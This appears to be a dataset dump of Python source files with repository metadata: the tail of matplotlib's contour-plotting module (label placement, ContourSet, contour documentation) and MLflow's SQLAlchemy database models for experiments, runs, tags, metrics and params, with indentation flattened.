def calc_label_rot_and_inline( self, slc, ind, lw, lc=None, spacing=5 ):
"""
This function calculates the appropriate label rotation given
the linecontour coordinates in screen units, the index of the
label location and the label width.
It will also break contour and calculate inlining if *lc* is
not empty (lc defaults to the empty list if None). *spacing*
is the space around the label in pixels to leave empty.
Do both of these tasks at once to avoid calling mlab.path_length
multiple times, which is relatively costly.
The method used here involves calculating the path length
along the contour in pixel coordinates and then looking
approximately label width / 2 away from central point to
determine rotation and then to break contour if desired.
"""
if lc is None: lc = []
# Half the label width
hlw = lw/2.0
# Check if closed and, if so, rotate contour so label is at edge
closed = mlab.is_closed_polygon(slc)
if closed:
slc = np.r_[ slc[ind:-1], slc[:ind+1] ]
if len(lc): # Rotate lc also if not empty
lc = np.r_[ lc[ind:-1], lc[:ind+1] ]
ind = 0
# Path length in pixel space
pl = mlab.path_length(slc)
pl = pl-pl[ind]
# Use linear interpolation to get points around label
xi = np.array( [ -hlw, hlw ] )
if closed: # Look at end also for closed contours
dp = np.array([pl[-1],0])
else:
dp = np.zeros_like(xi)
ll = mlab.less_simple_linear_interpolation( pl, slc, dp+xi,
extrap=True )
# get vector in pixel space coordinates from one point to other
dd = np.diff( ll, axis=0 ).ravel()
# Get angle of vector - must be calculated in pixel space for
# text rotation to work correctly
if np.all(dd==0): # Must deal with case of zero length label
rotation = 0.0
else:
rotation = np.arctan2(dd[1], dd[0]) * 180.0 / np.pi
# Fix angle so text is never upside-down
if rotation > 90:
rotation = rotation - 180.0
if rotation < -90:
rotation = 180.0 + rotation
# Break contour if desired
nlc = []
if len(lc):
# Expand range by spacing
xi = dp + xi + np.array([-spacing,spacing])
# Get indices near points of interest
I = mlab.less_simple_linear_interpolation(
pl, np.arange(len(pl)), xi, extrap=False )
# If those indices aren't beyond contour edge, find x,y
if (not np.isnan(I[0])) and int(I[0])<>I[0]:
xy1 = mlab.less_simple_linear_interpolation(
pl, lc, [ xi[0] ] )
if (not np.isnan(I[1])) and int(I[1])<>I[1]:
xy2 = mlab.less_simple_linear_interpolation(
pl, lc, [ xi[1] ] )
# Make integer
I = [ np.floor(I[0]), np.ceil(I[1]) ]
# Actually break contours
if closed:
# This will remove contour if shorter than label
if np.all(~np.isnan(I)):
nlc.append( np.r_[ xy2, lc[I[1]:I[0]+1], xy1 ] )
else:
# These will remove pieces of contour if they have length zero
if not np.isnan(I[0]):
nlc.append( np.r_[ lc[:I[0]+1], xy1 ] )
if not np.isnan(I[1]):
nlc.append( np.r_[ xy2, lc[I[1]:] ] )
# The current implementation removes contours completely
# covered by labels. Uncomment line below to keep
# original contour if this is the preferred behavoir.
#if not len(nlc): nlc = [ lc ]
return (rotation,nlc)
def add_label(self,x,y,rotation,lev,cvalue):
dx,dy = self.ax.transData.inverted().transform_point((x,y))
t = text.Text(dx, dy, rotation = rotation,
horizontalalignment='center',
verticalalignment='center')
color = self.labelMappable.to_rgba(cvalue,alpha=self.alpha)
_text = self.get_text(lev,self.labelFmt)
self.set_label_props(t, _text, color)
self.labelTexts.append(t)
self.labelCValues.append(cvalue)
self.labelXYs.append((x,y))
# Add label to plot here - useful for manual mode label selection
self.ax.add_artist(t)
def pop_label(self,index=-1):
'''Defaults to removing last label, but any index can be supplied'''
self.labelCValues.pop(index)
t = self.labelTexts.pop(index)
t.remove()
def labels(self, inline, inline_spacing):
trans = self.ax.transData # A bit of shorthand
for icon, lev, fsize, cvalue in zip(
self.labelIndiceList, self.labelLevelList, self.labelFontSizeList,
self.labelCValueList ):
con = self.collections[icon]
lw = self.get_label_width(lev, self.labelFmt, fsize)
additions = []
paths = con.get_paths()
for segNum, linepath in enumerate(paths):
lc = linepath.vertices # Line contour
slc0 = trans.transform(lc) # Line contour in screen coords
# For closed polygons, add extra point to avoid division by
# zero in print_label and locate_label. Other than these
# functions, this is not necessary and should probably be
# eventually removed.
if mlab.is_closed_polygon( lc ):
slc = np.r_[ slc0, slc0[1:2,:] ]
else:
slc = slc0
if self.print_label(slc,lw): # Check if long enough for a label
x,y,ind = self.locate_label(slc, lw)
if inline: lcarg = lc
else: lcarg = None
rotation,new=self.calc_label_rot_and_inline(
slc0, ind, lw, lcarg,
inline_spacing )
# Actually add the label
self.add_label(x,y,rotation,lev,cvalue)
# If inline, add new contours
if inline:
for n in new:
# Add path if not empty or single point
if len(n)>1: additions.append( path.Path(n) )
else: # If not adding label, keep old path
additions.append(linepath)
# After looping over all segments on a contour, remove old
# paths and add new ones if inlining
if inline:
del paths[:]
paths.extend(additions)
class ContourSet(cm.ScalarMappable, ContourLabeler):
"""
Create and store a set of contour lines or filled regions.
User-callable method: clabel
Useful attributes:
ax:
the axes object in which the contours are drawn
collections:
a silent_list of LineCollections or PolyCollections
levels:
contour levels
layers:
same as levels for line contours; half-way between
levels for filled contours. See _process_colors method.
"""
def __init__(self, ax, *args, **kwargs):
"""
Draw contour lines or filled regions, depending on
whether keyword arg 'filled' is False (default) or True.
The first argument of the initializer must be an axes
object. The remaining arguments and keyword arguments
are described in ContourSet.contour_doc.
"""
self.ax = ax
self.levels = kwargs.get('levels', None)
self.filled = kwargs.get('filled', False)
self.linewidths = kwargs.get('linewidths', None)
self.linestyles = kwargs.get('linestyles', 'solid')
self.alpha = kwargs.get('alpha', 1.0)
self.origin = kwargs.get('origin', None)
self.extent = kwargs.get('extent', None)
cmap = kwargs.get('cmap', None)
self.colors = kwargs.get('colors', None)
norm = kwargs.get('norm', None)
self.extend = kwargs.get('extend', 'neither')
self.antialiased = kwargs.get('antialiased', True)
self.nchunk = kwargs.get('nchunk', 0)
self.locator = kwargs.get('locator', None)
if (isinstance(norm, colors.LogNorm)
or isinstance(self.locator, ticker.LogLocator)):
self.logscale = True
if norm is None:
norm = colors.LogNorm()
if self.extend is not 'neither':
raise ValueError('extend kwarg does not work yet with log scale')
else:
self.logscale = False
if self.origin is not None: assert(self.origin in
['lower', 'upper', 'image'])
if self.extent is not None: assert(len(self.extent) == 4)
if cmap is not None: assert(isinstance(cmap, colors.Colormap))
if self.colors is not None and cmap is not None:
raise ValueError('Either colors or cmap must be None')
if self.origin == 'image': self.origin = mpl.rcParams['image.origin']
x, y, z = self._contour_args(*args) # also sets self.levels,
# self.layers
if self.colors is not None:
cmap = colors.ListedColormap(self.colors, N=len(self.layers))
if self.filled:
self.collections = cbook.silent_list('collections.PolyCollection')
else:
self.collections = cbook.silent_list('collections.LineCollection')
# label lists must be initialized here
self.labelTexts = []
self.labelCValues = []
kw = {'cmap': cmap}
if norm is not None:
kw['norm'] = norm
cm.ScalarMappable.__init__(self, **kw) # sets self.cmap;
self._process_colors()
_mask = ma.getmask(z)
if _mask is ma.nomask:
_mask = None
if self.filled:
if self.linewidths is not None:
warnings.warn('linewidths is ignored by contourf')
C = _cntr.Cntr(x, y, z.filled(), _mask)
lowers = self._levels[:-1]
uppers = self._levels[1:]
for level, level_upper in zip(lowers, uppers):
nlist = C.trace(level, level_upper, points = 0,
nchunk = self.nchunk)
col = collections.PolyCollection(nlist,
antialiaseds = (self.antialiased,),
edgecolors= 'none',
alpha=self.alpha)
self.ax.add_collection(col)
self.collections.append(col)
else:
tlinewidths = self._process_linewidths()
self.tlinewidths = tlinewidths
tlinestyles = self._process_linestyles()
C = _cntr.Cntr(x, y, z.filled(), _mask)
for level, width, lstyle in zip(self.levels, tlinewidths, tlinestyles):
nlist = C.trace(level, points = 0)
col = collections.LineCollection(nlist,
linewidths = width,
linestyle = lstyle,
alpha=self.alpha)
if level < 0.0 and self.monochrome:
ls = mpl.rcParams['contour.negative_linestyle']
col.set_linestyle(ls)
col.set_label('_nolegend_')
self.ax.add_collection(col, False)
self.collections.append(col)
self.changed() # set the colors
x0 = ma.minimum(x)
x1 = ma.maximum(x)
y0 = ma.minimum(y)
y1 = ma.maximum(y)
self.ax.update_datalim([(x0,y0), (x1,y1)])
self.ax.autoscale_view()
def changed(self):
tcolors = [ (tuple(rgba),) for rgba in
self.to_rgba(self.cvalues, alpha=self.alpha)]
self.tcolors = tcolors
for color, collection in zip(tcolors, self.collections):
collection.set_alpha(self.alpha)
collection.set_color(color)
for label, cv in zip(self.labelTexts, self.labelCValues):
label.set_alpha(self.alpha)
label.set_color(self.labelMappable.to_rgba(cv))
# add label colors
cm.ScalarMappable.changed(self)
def _autolev(self, z, N):
'''
Select contour levels to span the data.
We need two more levels for filled contours than for
line contours, because for the latter we need to specify
the lower and upper boundary of each range. For example,
a single contour boundary, say at z = 0, requires only
one contour line, but two filled regions, and therefore
three levels to provide boundaries for both regions.
'''
if self.locator is None:
if self.logscale:
self.locator = ticker.LogLocator()
else:
self.locator = ticker.MaxNLocator(N+1)
self.locator.create_dummy_axis()
zmax = self.zmax
zmin = self.zmin
self.locator.set_bounds(zmin, zmax)
lev = self.locator()
zmargin = (zmax - zmin) * 0.000001 # so z < (zmax + zmargin)
if zmax >= lev[-1]:
lev[-1] += zmargin
if zmin <= lev[0]:
if self.logscale:
lev[0] = 0.99 * zmin
else:
lev[0] -= zmargin
self._auto = True
if self.filled:
return lev
return lev[1:-1]
def _initialize_x_y(self, z):
'''
Return X, Y arrays such that contour(Z) will match imshow(Z)
if origin is not None.
The center of pixel Z[i,j] depends on origin:
if origin is None, x = j, y = i;
if origin is 'lower', x = j + 0.5, y = i + 0.5;
if origin is 'upper', x = j + 0.5, y = Nrows - i - 0.5
If extent is not None, x and y will be scaled to match,
as in imshow.
If origin is None and extent is not None, then extent
will give the minimum and maximum values of x and y.
'''
if z.ndim != 2:
raise TypeError("Input must be a 2D array.")
else:
Ny, Nx = z.shape
if self.origin is None: # Not for image-matching.
if self.extent is None:
return np.meshgrid(np.arange(Nx), np.arange(Ny))
else:
x0,x1,y0,y1 = self.extent
x = np.linspace(x0, x1, Nx)
y = np.linspace(y0, y1, Ny)
return np.meshgrid(x, y)
# Match image behavior:
if self.extent is None:
x0,x1,y0,y1 = (0, Nx, 0, Ny)
else:
x0,x1,y0,y1 = self.extent
dx = float(x1 - x0)/Nx
dy = float(y1 - y0)/Ny
x = x0 + (np.arange(Nx) + 0.5) * dx
y = y0 + (np.arange(Ny) + 0.5) * dy
if self.origin == 'upper':
y = y[::-1]
return np.meshgrid(x,y)
def _check_xyz(self, args):
'''
For functions like contour, check that the dimensions
of the input arrays match; if x and y are 1D, convert
them to 2D using meshgrid.
Possible change: I think we should make and use an ArgumentError
Exception class (here and elsewhere).
'''
# We can strip away the x and y units
x = self.ax.convert_xunits( args[0] )
y = self.ax.convert_yunits( args[1] )
x = np.asarray(x, dtype=np.float64)
y = np.asarray(y, dtype=np.float64)
z = ma.asarray(args[2], dtype=np.float64)
if z.ndim != 2:
raise TypeError("Input z must be a 2D array.")
else: Ny, Nx = z.shape
if x.shape == z.shape and y.shape == z.shape:
return x,y,z
if x.ndim != 1 or y.ndim != 1:
raise TypeError("Inputs x and y must be 1D or 2D.")
nx, = x.shape
ny, = y.shape
if nx != Nx or ny != Ny:
raise TypeError("Length of x must be number of columns in z,\n" +
"and length of y must be number of rows.")
x,y = np.meshgrid(x,y)
return x,y,z
def _contour_args(self, *args):
if self.filled: fn = 'contourf'
else: fn = 'contour'
Nargs = len(args)
if Nargs <= 2:
z = ma.asarray(args[0], dtype=np.float64)
x, y = self._initialize_x_y(z)
elif Nargs <=4:
x,y,z = self._check_xyz(args[:3])
else:
raise TypeError("Too many arguments to %s; see help(%s)" % (fn,fn))
self.zmax = ma.maximum(z)
self.zmin = ma.minimum(z)
if self.logscale and self.zmin <= 0:
z = ma.masked_where(z <= 0, z)
warnings.warn('Log scale: values of z <=0 have been masked')
self.zmin = z.min()
self._auto = False
if self.levels is None:
if Nargs == 1 or Nargs == 3:
lev = self._autolev(z, 7)
else: # 2 or 4 args
level_arg = args[-1]
try:
if type(level_arg) == int:
lev = self._autolev(z, level_arg)
else:
lev = np.asarray(level_arg).astype(np.float64)
except:
raise TypeError(
"Last %s arg must give levels; see help(%s)" % (fn,fn))
if self.filled and len(lev) < 2:
raise ValueError("Filled contours require at least 2 levels.")
# Workaround for cntr.c bug wrt masked interior regions:
#if filled:
# z = ma.masked_array(z.filled(-1e38))
# It's not clear this is any better than the original bug.
self.levels = lev
#if self._auto and self.extend in ('both', 'min', 'max'):
# raise TypeError("Auto level selection is inconsistent "
# + "with use of 'extend' kwarg")
self._levels = list(self.levels)
if self.extend in ('both', 'min'):
self._levels.insert(0, min(self.levels[0],self.zmin) - 1)
if self.extend in ('both', 'max'):
self._levels.append(max(self.levels[-1],self.zmax) + 1)
self._levels = np.asarray(self._levels)
self.vmin = np.amin(self.levels) # alternative would be self.layers
self.vmax = np.amax(self.levels)
if self.extend in ('both', 'min'):
self.vmin = 2 * self.levels[0] - self.levels[1]
if self.extend in ('both', 'max'):
self.vmax = 2 * self.levels[-1] - self.levels[-2]
self.layers = self._levels # contour: a line is a thin layer
if self.filled:
self.layers = 0.5 * (self._levels[:-1] + self._levels[1:])
if self.extend in ('both', 'min'):
self.layers[0] = 0.5 * (self.vmin + self._levels[1])
if self.extend in ('both', 'max'):
self.layers[-1] = 0.5 * (self.vmax + self._levels[-2])
return (x, y, z)
def _process_colors(self):
"""
Color argument processing for contouring.
Note that we base the color mapping on the contour levels,
not on the actual range of the Z values. This means we
don't have to worry about bad values in Z, and we always have
the full dynamic range available for the selected levels.
The color is based on the midpoint of the layer, except for
an extended end layers.
"""
self.monochrome = self.cmap.monochrome
if self.colors is not None:
i0, i1 = 0, len(self.layers)
if self.extend in ('both', 'min'):
i0 = -1
if self.extend in ('both', 'max'):
i1 = i1 + 1
self.cvalues = range(i0, i1)
self.set_norm(colors.NoNorm())
else:
self.cvalues = self.layers
if not self.norm.scaled():
self.set_clim(self.vmin, self.vmax)
if self.extend in ('both', 'max', 'min'):
self.norm.clip = False
self.set_array(self.layers)
# self.tcolors are set by the "changed" method
def _process_linewidths(self):
linewidths = self.linewidths
Nlev = len(self.levels)
if linewidths is None:
tlinewidths = [(mpl.rcParams['lines.linewidth'],)] *Nlev
else:
if cbook.iterable(linewidths) and len(linewidths) < Nlev:
linewidths = list(linewidths) * int(np.ceil(Nlev/len(linewidths)))
elif not cbook.iterable(linewidths) and type(linewidths) in [int, float]:
linewidths = [linewidths] * Nlev
tlinewidths = [(w,) for w in linewidths]
return tlinewidths
def _process_linestyles(self):
linestyles = self.linestyles
Nlev = len(self.levels)
if linestyles is None:
tlinestyles = ['solid'] * Nlev
else:
if cbook.is_string_like(linestyles):
tlinestyles = [linestyles] * Nlev
elif cbook.iterable(linestyles) and len(linestyles) <= Nlev:
tlinestyles = list(linestyles) * int(np.ceil(Nlev/len(linestyles)))
return tlinestyles
def get_alpha(self):
'''returns alpha to be applied to all ContourSet artists'''
return self.alpha
def set_alpha(self, alpha):
'''sets alpha for all ContourSet artists'''
self.alpha = alpha
self.changed()
contour_doc = """
:func:`~matplotlib.pyplot.contour` and
:func:`~matplotlib.pyplot.contourf` draw contour lines and
filled contours, respectively. Except as noted, function
signatures and return values are the same for both versions.
:func:`~matplotlib.pyplot.contourf` differs from the Matlab
(TM) version in that it does not draw the polygon edges,
because the contouring engine yields simply connected regions
with branch cuts. To draw the edges, add line contours with
calls to :func:`~matplotlib.pyplot.contour`.
call signatures::
contour(Z)
make a contour plot of an array *Z*. The level values are chosen
automatically.
::
contour(X,Y,Z)
*X*, *Y* specify the (*x*, *y*) coordinates of the surface
::
contour(Z,N)
contour(X,Y,Z,N)
contour *N* automatically-chosen levels.
::
contour(Z,V)
contour(X,Y,Z,V)
draw contour lines at the values specified in sequence *V*
::
contourf(..., V)
fill the (len(*V*)-1) regions between the values in *V*
::
contour(Z, **kwargs)
Use keyword args to control colors, linewidth, origin, cmap ... see
below for more details.
*X*, *Y*, and *Z* must be arrays with the same dimensions.
*Z* may be a masked array, but filled contouring may not
handle internal masked regions correctly.
``C = contour(...)`` returns a
:class:`~matplotlib.contour.ContourSet` object.
Optional keyword arguments:
*colors*: [ None | string | (mpl_colors) ]
If *None*, the colormap specified by cmap will be used.
If a string, like 'r' or 'red', all levels will be plotted in this
color.
If a tuple of matplotlib color args (string, float, rgb, etc),
different levels will be plotted in different colors in the order
specified.
*alpha*: float
The alpha blending value
*cmap*: [ None | Colormap ]
A cm :class:`~matplotlib.cm.Colormap` instance or
*None*. If *cmap* is *None* and *colors* is *None*, a
default Colormap is used.
*norm*: [ None | Normalize ]
A :class:`matplotlib.colors.Normalize` instance for
scaling data values to colors. If *norm* is *None* and
*colors* is *None*, the default linear scaling is used.
*origin*: [ None | 'upper' | 'lower' | 'image' ]
If *None*, the first value of *Z* will correspond to the
lower left corner, location (0,0). If 'image', the rc
value for ``image.origin`` will be used.
This keyword is not active if *X* and *Y* are specified in
the call to contour.
*extent*: [ None | (x0,x1,y0,y1) ]
If *origin* is not *None*, then *extent* is interpreted as
in :func:`matplotlib.pyplot.imshow`: it gives the outer
pixel boundaries. In this case, the position of Z[0,0]
is the center of the pixel, not a corner. If *origin* is
*None*, then (*x0*, *y0*) is the position of Z[0,0], and
(*x1*, *y1*) is the position of Z[-1,-1].
This keyword is not active if *X* and *Y* are specified in
the call to contour.
*locator*: [ None | ticker.Locator subclass ]
If *locator* is None, the default
:class:`~matplotlib.ticker.MaxNLocator` is used. The
locator is used to determine the contour levels if they
are not given explicitly via the *V* argument.
*extend*: [ 'neither' | 'both' | 'min' | 'max' ]
Unless this is 'neither', contour levels are automatically
added to one or both ends of the range so that all data
are included. These added ranges are then mapped to the
special colormap values which default to the ends of the
colormap range, but can be set via
:meth:`matplotlib.cm.Colormap.set_under` and
:meth:`matplotlib.cm.Colormap.set_over` methods.
contour-only keyword arguments:
*linewidths*: [ None | number | tuple of numbers ]
If *linewidths* is *None*, the default width in
``lines.linewidth`` in ``matplotlibrc`` is used.
If a number, all levels will be plotted with this linewidth.
If a tuple, different levels will be plotted with different
linewidths in the order specified
*linestyles*: [None | 'solid' | 'dashed' | 'dashdot' | 'dotted' ]
If *linestyles* is *None*, the 'solid' is used.
*linestyles* can also be an iterable of the above strings
specifying a set of linestyles to be used. If this
iterable is shorter than the number of contour levels
it will be repeated as necessary.
If contour is using a monochrome colormap and the contour
level is less than 0, then the linestyle specified
in ``contour.negative_linestyle`` in ``matplotlibrc``
will be used.
contourf-only keyword arguments:
*antialiased*: [ True | False ]
enable antialiasing
*nchunk*: [ 0 | integer ]
If 0, no subdivision of the domain. Specify a positive integer to
divide the domain into subdomains of roughly *nchunk* by *nchunk*
points. This may never actually be advantageous, so this option may
be removed. Chunking introduces artifacts at the chunk boundaries
unless *antialiased* is *False*.
**Example:**
.. plot:: mpl_examples/pylab_examples/contour_demo.py
"""
def find_nearest_contour( self, x, y, indices=None, pixel=True ):
"""
Finds contour that is closest to a point. Defaults to
measuring distance in pixels (screen space - useful for manual
contour labeling), but this can be controlled via a keyword
argument.
Returns a tuple containing the contour, segment, index of
segment, x & y of segment point and distance to minimum point.
Call signature::
conmin,segmin,imin,xmin,ymin,dmin = find_nearest_contour(
self, x, y, indices=None, pixel=True )
Optional keyword arguments::
*indices*:
Indexes of contour levels to consider when looking for
nearest point. Defaults to using all levels.
*pixel*:
If *True*, measure distance in pixel space, if not, measure
distance in axes space. Defaults to *True*.
"""
# This function uses a method that is probably quite
# inefficient based on converting each contour segment to
# pixel coordinates and then comparing the given point to
# those coordinates for each contour. This will probably be
# quite slow for complex contours, but for normal use it works
# sufficiently well that the time is not noticeable.
# Nonetheless, improvements could probably be made.
if indices==None:
indices = range(len(self.levels))
dmin = 1e10
conmin = None
segmin = None
xmin = None
ymin = None
for icon in indices:
con = self.collections[icon]
paths = con.get_paths()
for segNum, linepath in enumerate(paths):
lc = linepath.vertices
# transfer all data points to screen coordinates if desired
if pixel:
lc = self.ax.transData.transform(lc)
ds = (lc[:,0]-x)**2 + (lc[:,1]-y)**2
d = min( ds )
if d < dmin:
dmin = d
conmin = icon
segmin = segNum
imin = mpl.mlab.find( ds == d )[0]
xmin = lc[imin,0]
ymin = lc[imin,1]
return (conmin,segmin,imin,xmin,ymin,dmin)
| 38.100543 | 85 | 0.564035 |
52ac39d599cc31d8097d3e4f8962cb41a469ed80
| 11,450 |
py
|
Python
|
mlflow/store/dbmodels/models.py
|
margaret-databricks/mlflow
|
25dcf038e6a6a6c4e26ff3f55391eaedeeb25293
|
[
"Apache-2.0"
] | null | null | null |
mlflow/store/dbmodels/models.py
|
margaret-databricks/mlflow
|
25dcf038e6a6a6c4e26ff3f55391eaedeeb25293
|
[
"Apache-2.0"
] | null | null | null |
mlflow/store/dbmodels/models.py
|
margaret-databricks/mlflow
|
25dcf038e6a6a6c4e26ff3f55391eaedeeb25293
|
[
"Apache-2.0"
] | null | null | null |
import time
from sqlalchemy.orm import relationship, backref
from sqlalchemy import (
Column, String, Float, ForeignKey, Integer, CheckConstraint,
BigInteger, PrimaryKeyConstraint)
from sqlalchemy.ext.declarative import declarative_base
from mlflow.entities import (
Experiment, RunTag, Metric, Param, RunData, RunInfo,
SourceType, RunStatus, Run, ViewType)
from mlflow.entities.lifecycle_stage import LifecycleStage
Base = declarative_base()
SourceTypes = [
SourceType.to_string(SourceType.NOTEBOOK),
SourceType.to_string(SourceType.JOB),
SourceType.to_string(SourceType.LOCAL),
SourceType.to_string(SourceType.UNKNOWN),
SourceType.to_string(SourceType.PROJECT)
]
RunStatusTypes = [
RunStatus.to_string(RunStatus.SCHEDULED),
RunStatus.to_string(RunStatus.FAILED),
RunStatus.to_string(RunStatus.FINISHED),
RunStatus.to_string(RunStatus.RUNNING)
]
def _create_entity(base, model):
# create dict of kwargs properties for entity and return the initialized entity
config = {}
for k in base._properties():
# check if its mlflow entity and build it
obj = getattr(model, k)
if isinstance(model, SqlRun):
if base is RunData:
# Run data contains list for metrics, params and tags
# so obj will be a list so we need to convert those items
if k == 'metrics':
# only get latest recorded metrics per key
metrics = {}
for o in obj:
existing_metric = metrics.get(o.key)
if (existing_metric is None)\
or ((o.step, o.timestamp, o.value) >=
(existing_metric.step, existing_metric.timestamp,
existing_metric.value)):
metrics[o.key] = Metric(o.key, o.value, o.timestamp, o.step)
obj = list(metrics.values())
elif k == 'params':
obj = [Param(o.key, o.value) for o in obj]
elif k == 'tags':
obj = [RunTag(o.key, o.value) for o in obj]
elif base is RunInfo:
if k == 'source_type':
obj = SourceType.from_string(obj)
elif k == "status":
obj = RunStatus.from_string(obj)
elif k == "experiment_id":
obj = str(obj)
# Our data model defines experiment_ids as ints, but the in-memory representation was
# changed to be a string in time for 1.0.
if isinstance(model, SqlExperiment) and k == "experiment_id":
obj = str(obj)
config[k] = obj
return base(**config)
class SqlExperiment(Base):
"""
DB model for :py:class:`mlflow.entities.Experiment`. These are recorded in ``experiment`` table.
"""
__tablename__ = 'experiments'
experiment_id = Column(Integer, autoincrement=True)
"""
Experiment ID: `Integer`. *Primary Key* for ``experiment`` table.
"""
name = Column(String(256), unique=True, nullable=False)
"""
Experiment name: `String` (limit 256 characters). Defined as *Unique* and *Non null* in
table schema.
"""
artifact_location = Column(String(256), nullable=True)
"""
Default artifact location for this experiment: `String` (limit 256 characters). Defined as
*Non null* in table schema.
"""
lifecycle_stage = Column(String(32), default=LifecycleStage.ACTIVE)
"""
Lifecycle Stage of experiment: `String` (limit 32 characters).
Can be either ``active`` (default) or ``deleted``.
"""
__table_args__ = (
CheckConstraint(
lifecycle_stage.in_(LifecycleStage.view_type_to_stages(ViewType.ALL)),
name='lifecycle_stage'),
PrimaryKeyConstraint('experiment_id', name='experiment_pk')
)
def __repr__(self):
return '<SqlExperiment ({}, {})>'.format(self.experiment_id, self.name)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.Experiment`.
"""
return _create_entity(Experiment, self)
class SqlRun(Base):
"""
DB model for :py:class:`mlflow.entities.Run`. These are recorded in ``runs`` table.
"""
__tablename__ = 'runs'
run_uuid = Column(String(32), nullable=False)
"""
Run UUID: `String` (limit 32 characters). *Primary Key* for ``runs`` table.
"""
name = Column(String(250))
"""
Run name: `String` (limit 250 characters).
"""
source_type = Column(String(20), default=SourceType.to_string(SourceType.LOCAL))
"""
Source Type: `String` (limit 20 characters). Can be one of ``NOTEBOOK``, ``JOB``, ``PROJECT``,
``LOCAL`` (default), or ``UNKNOWN``.
"""
source_name = Column(String(500))
"""
Name of source recording the run: `String` (limit 500 characters).
"""
entry_point_name = Column(String(50))
"""
Entry-point name that launched the run run: `String` (limit 50 characters).
"""
user_id = Column(String(256), nullable=True, default=None)
"""
User ID: `String` (limit 256 characters). Defaults to ``null``.
"""
status = Column(String(20), default=RunStatus.to_string(RunStatus.SCHEDULED))
"""
Run Status: `String` (limit 20 characters). Can be one of ``RUNNING``, ``SCHEDULED`` (default),
``FINISHED``, ``FAILED``.
"""
start_time = Column(BigInteger, default=int(time.time()))
"""
Run start time: `BigInteger`. Defaults to current system time.
"""
end_time = Column(BigInteger, nullable=True, default=None)
"""
Run end time: `BigInteger`.
"""
source_version = Column(String(50))
"""
Source version: `String` (limit 50 characters).
"""
lifecycle_stage = Column(String(20), default=LifecycleStage.ACTIVE)
"""
Lifecycle Stage of run: `String` (limit 32 characters).
Can be either ``active`` (default) or ``deleted``.
"""
artifact_uri = Column(String(200), default=None)
"""
Default artifact location for this run: `String` (limit 200 characters).
"""
experiment_id = Column(Integer, ForeignKey('experiments.experiment_id'))
"""
Experiment ID to which this run belongs to: *Foreign Key* into ``experiment`` table.
"""
experiment = relationship('SqlExperiment', backref=backref('runs', cascade='all'))
"""
SQLAlchemy relationship (many:one) with :py:class:`mlflow.store.dbmodels.models.SqlExperiment`.
"""
__table_args__ = (
CheckConstraint(source_type.in_(SourceTypes), name='source_type'),
CheckConstraint(status.in_(RunStatusTypes), name='status'),
CheckConstraint(lifecycle_stage.in_(LifecycleStage.view_type_to_stages(ViewType.ALL)),
name='lifecycle_stage'),
PrimaryKeyConstraint('run_uuid', name='run_pk')
)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.Run`.
"""
# run has diff parameter names in __init__ than in properties_ so we do this manually
info = _create_entity(RunInfo, self)
data = _create_entity(RunData, self)
return Run(run_info=info, run_data=data)
class SqlTag(Base):
"""
DB model for :py:class:`mlflow.entities.RunTag`. These are recorded in ``tags`` table.
"""
__tablename__ = 'tags'
key = Column(String(250))
"""
Tag key: `String` (limit 250 characters). *Primary Key* for ``tags`` table.
"""
value = Column(String(250), nullable=True)
"""
Value associated with tag: `String` (limit 250 characters). Could be *null*.
"""
run_uuid = Column(String(32), ForeignKey('runs.run_uuid'))
"""
Run UUID to which this tag belongs to: *Foreign Key* into ``runs`` table.
"""
run = relationship('SqlRun', backref=backref('tags', cascade='all'))
"""
SQLAlchemy relationship (many:one) with :py:class:`mlflow.store.dbmodels.models.SqlRun`.
"""
__table_args__ = (
PrimaryKeyConstraint('key', 'run_uuid', name='tag_pk'),
)
def __repr__(self):
return '<SqlRunTag({}, {})>'.format(self.key, self.value)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.RunTag`.
"""
return _create_entity(RunTag, self)
class SqlMetric(Base):
__tablename__ = 'metrics'
key = Column(String(250))
"""
Metric key: `String` (limit 250 characters). Part of *Primary Key* for ``metrics`` table.
"""
value = Column(Float, nullable=False)
"""
Metric value: `Float`. Defined as *Non-null* in schema.
"""
timestamp = Column(BigInteger, default=lambda: int(time.time()))
"""
Timestamp recorded for this metric entry: `BigInteger`. Part of *Primary Key* for
``metrics`` table.
"""
step = Column(BigInteger, default=0)
"""
Step recorded for this metric entry: `BigInteger`.
"""
run_uuid = Column(String(32), ForeignKey('runs.run_uuid'))
"""
Run UUID to which this metric belongs to: Part of *Primary Key* for ``metrics`` table.
*Foreign Key* into ``runs`` table.
"""
run = relationship('SqlRun', backref=backref('metrics', cascade='all'))
"""
SQLAlchemy relationship (many:one) with :py:class:`mlflow.store.dbmodels.models.SqlRun`.
"""
__table_args__ = (
PrimaryKeyConstraint('key', 'timestamp', 'step', 'run_uuid', 'value', name='metric_pk'),
)
def __repr__(self):
return '<SqlMetric({}, {}, {}, {})>'.format(self.key, self.value, self.timestamp, self.step)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.Metric`.
"""
return _create_entity(Metric, self)
class SqlParam(Base):
__tablename__ = 'params'
key = Column(String(250))
"""
Param key: `String` (limit 250 characters). Part of *Primary Key* for ``params`` table.
"""
value = Column(String(250), nullable=False)
"""
Param value: `String` (limit 250 characters). Defined as *Non-null* in schema.
"""
run_uuid = Column(String(32), ForeignKey('runs.run_uuid'))
"""
Run UUID to which this metric belongs to: Part of *Primary Key* for ``params`` table.
*Foreign Key* into ``runs`` table.
"""
run = relationship('SqlRun', backref=backref('params', cascade='all'))
"""
SQLAlchemy relationship (many:one) with :py:class:`mlflow.store.dbmodels.models.SqlRun`.
"""
__table_args__ = (
PrimaryKeyConstraint('key', 'run_uuid', name='param_pk'),
)
def __repr__(self):
return '<SqlParam({}, {})>'.format(self.key, self.value)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.Param`.
"""
return _create_entity(Param, self)
| 35.122699 | 100 | 0.602795 |
e749ae0a152fbfbdd73e27d215fc707cb36fb963
| 1,366 |
py
|
Python
|
ingenico/direct/sdk/domain/fixed_list_validator.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
ingenico/direct/sdk/domain/fixed_list_validator.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
